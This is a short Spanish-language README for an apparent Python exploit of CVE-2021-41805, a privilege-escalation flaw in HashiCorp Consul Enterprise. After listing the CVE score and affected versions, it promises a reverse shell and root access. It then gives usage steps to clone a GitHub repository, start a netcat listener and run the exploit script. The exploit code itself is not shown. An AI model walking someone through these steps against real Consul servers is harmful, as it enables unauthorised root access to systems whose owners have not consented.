
Exploit de HashiCorp Consul con python. (CVE-2021-41805)
HashiCorp Consul Enterprise anterior a 1.8.17, 1.9.x anterior a 1.9.11, y 1.10.x anterior a 1.10.4 tiene un control de acceso incorrecto. Un token ACL (con los permisos predeterminados operator:write) en un namespace puede utilizarse para una escalada de privilegios no intencionada en un namespace diferente.
CVE_ID : CVE-2021-41805
Puntuación base : 8.8
Severidad : Alta
Emitido el : 2021-12-12
Versiones afectadas : HashiCorp Consul Enterprise anterior a 1.8.17, 1.9.x anterior a 1.9.11, y 1.10.x anterior a 1.10.4
https://www.cvedetails.com/cve/CVE-2021-41805/
https://security.netapp.com/advisory/ntap-20211229-0007/
Obtén una reverse shell y acceso root.
git clone https://github.com/I-Am-Nelson/CVE-2021-41805.git
cd CVE-2021-41805
Luego inicia el listener:
sudo nc -lvnp <port>
Luego ejecuta el exploit:
python3 CVE-2021-41805.py